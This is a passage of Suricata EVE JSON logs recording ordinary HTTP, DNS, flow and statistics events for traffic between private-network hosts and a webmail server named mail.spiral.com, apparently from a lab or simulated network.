Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":121},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":128,"tx_id":1}} {"timestamp":"2020-02-29T00:12:58.000240+0000","event_type":"stats","stats":{"uptime":14430,"capture":{"kernel_packets":135364,"kernel_drops":0},"decoder":{"pkts":135370,"bytes":93299408,"invalid":187,"ipv4":133875,"ipv6":8,"ethernet":135370,"raw":0,"null":0,"sll":0,"tcp":128583,"udp":5090,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2766,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2782,"synack":2773,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1805,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2325,"failed_udp":111},"tx":{"http":4657,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2405}},"flow_mgr":{"closed_pruned":2743,"new_pruned":15,"est_pruned":2370,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22478,"memcap_state":0,"memcap_global":0},"http":{"memuse":58099,"memcap":0}}} {"timestamp":"2020-02-29T00:12:59.579081+0000","flow_id":859365721232905,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39736,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43294,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:59.687284+0000","flow_id":859365721232905,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39736,"proto":"UDP","dns":{"type":"answer","id":43294,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:59.687284+0000","flow_id":859365721232905,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39736,"proto":"UDP","dns":{"type":"answer","id":43294,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:59.755268+0000","flow_id":98370530812316,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/deleteEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":200}} {"timestamp":"2020-02-29T00:12:59.755268+0000","flow_id":98370530812316,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/deleteEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":200},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/deleteEvent","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:13:03.000496+0000","flow_id":1012670264431159,"event_type":"flow","src_ip":"192.168.10.122","src_port":58162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:08:02.053815+0000","end":"2020-02-29T00:08:02.162101+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:04.756758+0000","flow_id":98370530812316,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52748,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/deleteEvent","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":200},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/deleteEvent","state":"CLOSED","stored":false,"size":210,"tx_id":0}} {"timestamp":"2020-02-29T00:13:05.000299+0000","event_type":"stats","stats":{"uptime":14437,"capture":{"kernel_packets":135371,"kernel_drops":0},"decoder":{"pkts":135379,"bytes":93301537,"invalid":187,"ipv4":133884,"ipv6":8,"ethernet":135379,"raw":0,"null":0,"sll":0,"tcp":128590,"udp":5092,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2767,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2783,"synack":2774,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1806,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2326,"failed_udp":111},"tx":{"http":4658,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2406}},"flow_mgr":{"closed_pruned":2743,"new_pruned":15,"est_pruned":2371,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":1,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22477,"memcap_state":0,"memcap_global":0},"http":{"memuse":58179,"memcap":0}}} {"timestamp":"2020-02-29T00:13:07.308166+0000","flow_id":1204526473524166,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46995,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64728,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:07.416966+0000","flow_id":1204526473524166,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46995,"proto":"UDP","dns":{"type":"answer","id":64728,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:07.416966+0000","flow_id":1204526473524166,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46995,"proto":"UDP","dns":{"type":"answer","id":64728,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:07.606223+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7919}} {"timestamp":"2020-02-29T00:13:08.000485+0000","flow_id":299443715105269,"event_type":"flow","src_ip":"192.168.10.81","src_port":52730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":9,"bytes_toserver":1312,"bytes_toclient":3258,"start":"2020-02-29T00:11:48.188917+0000","end":"2020-02-29T00:11:58.329407+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:09.000397+0000","flow_id":739926956553289,"event_type":"flow","src_ip":"192.168.10.122","src_port":36865,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:07.963657+0000","end":"2020-02-29T00:08:08.072093+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:09.001174+0000","flow_id":483732157340798,"event_type":"flow","src_ip":"192.168.10.122","src_port":44264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:08:07.957566+0000","end":"2020-02-29T00:08:08.066104+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:10.166487+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52750,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7919},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":44805,"tx_id":0}} {"timestamp":"2020-02-29T00:13:10.177839+0000","flow_id":969226690410159,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37907,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54470,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:10.286032+0000","flow_id":969226690410159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37907,"proto":"UDP","dns":{"type":"answer","id":54470,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:10.286032+0000","flow_id":969226690410159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37907,"proto":"UDP","dns":{"type":"answer","id":54470,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:10.362060+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525}} {"timestamp":"2020-02-29T00:13:10.588089+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52750,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36694,"tx_id":1}} {"timestamp":"2020-02-29T00:13:10.603094+0000","flow_id":1108070098154454,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53042,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12091,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:10.711700+0000","flow_id":1108070098154454,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53042,"proto":"UDP","dns":{"type":"answer","id":12091,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:10.711700+0000","flow_id":1108070098154454,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53042,"proto":"UDP","dns":{"type":"answer","id":12091,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:10.769376+0000","flow_id":1491443173997920,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":40263,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:10.782469+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957}} {"timestamp":"2020-02-29T00:13:10.782469+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:13:10.877835+0000","flow_id":1491443173997920,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42597,"proto":"UDP","dns":{"type":"answer","id":40263,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:10.877835+0000","flow_id":1491443173997920,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42597,"proto":"UDP","dns":{"type":"answer","id":40263,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:11.001346+0000","flow_id":1075243643438853,"event_type":"flow","src_ip":"192.168.10.122","src_port":46096,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:10.657157+0000","end":"2020-02-29T00:08:10.765374+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:11.031139+0000","flow_id":489251210174079,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34814,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7088}} {"timestamp":"2020-02-29T00:13:12.000321+0000","event_type":"stats","stats":{"uptime":14444,"capture":{"kernel_packets":135387,"kernel_drops":0},"decoder":{"pkts":135402,"bytes":93311937,"invalid":187,"ipv4":133907,"ipv6":8,"ethernet":135402,"raw":0,"null":0,"sll":0,"tcp":128611,"udp":5094,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2768,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2784,"synack":2775,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1807,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2327,"failed_udp":111},"tx":{"http":4659,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2407}},"flow_mgr":{"closed_pruned":2744,"new_pruned":15,"est_pruned":2373,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22807,"memcap_state":0,"memcap_global":0},"http":{"memuse":125920,"memcap":0}}} {"timestamp":"2020-02-29T00:13:12.002010+0000","flow_id":417014135629625,"event_type":"flow","src_ip":"192.168.10.122","src_port":47136,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:11.108345+0000","end":"2020-02-29T00:08:11.216826+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:12.019322+0000","flow_id":1019705441143674,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44779,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64358,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:12.127791+0000","flow_id":1019705441143674,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44779,"proto":"UDP","dns":{"type":"answer","id":64358,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:12.127791+0000","flow_id":1019705441143674,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44779,"proto":"UDP","dns":{"type":"answer","id":64358,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:12.184452+0000","flow_id":700400392481363,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34816,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608}} {"timestamp":"2020-02-29T00:13:15.783714+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52750,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2491,"tx_id":2}} {"timestamp":"2020-02-29T00:13:16.036811+0000","flow_id":489251210174079,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34814,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7088},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":38922,"tx_id":0}} {"timestamp":"2020-02-29T00:13:17.187207+0000","flow_id":700400392481363,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34816,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20700,"tx_id":0}} {"timestamp":"2020-02-29T00:13:18.890267+0000","flow_id":36278189856155,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46056,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32443,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:18.998610+0000","flow_id":36278189856155,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46056,"proto":"UDP","dns":{"type":"answer","id":32443,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:18.998610+0000","flow_id":36278189856155,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46056,"proto":"UDP","dns":{"type":"answer","id":32443,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:19.000188+0000","event_type":"stats","stats":{"uptime":14451,"capture":{"kernel_packets":135471,"kernel_drops":0},"decoder":{"pkts":135474,"bytes":93343332,"invalid":187,"ipv4":133979,"ipv6":8,"ethernet":135474,"raw":0,"null":0,"sll":0,"tcp":128673,"udp":5104,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099648},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2770,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2786,"synack":2777,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1809,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2331,"failed_udp":112},"tx":{"http":4663,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2411}},"flow_mgr":{"closed_pruned":2744,"new_pruned":15,"est_pruned":2375,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23138,"memcap_state":0,"memcap_global":0},"http":{"memuse":78933,"memcap":0}}} {"timestamp":"2020-02-29T00:13:19.093745+0000","flow_id":875772497513137,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409}} {"timestamp":"2020-02-29T00:13:19.093745+0000","flow_id":875772497513137,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} 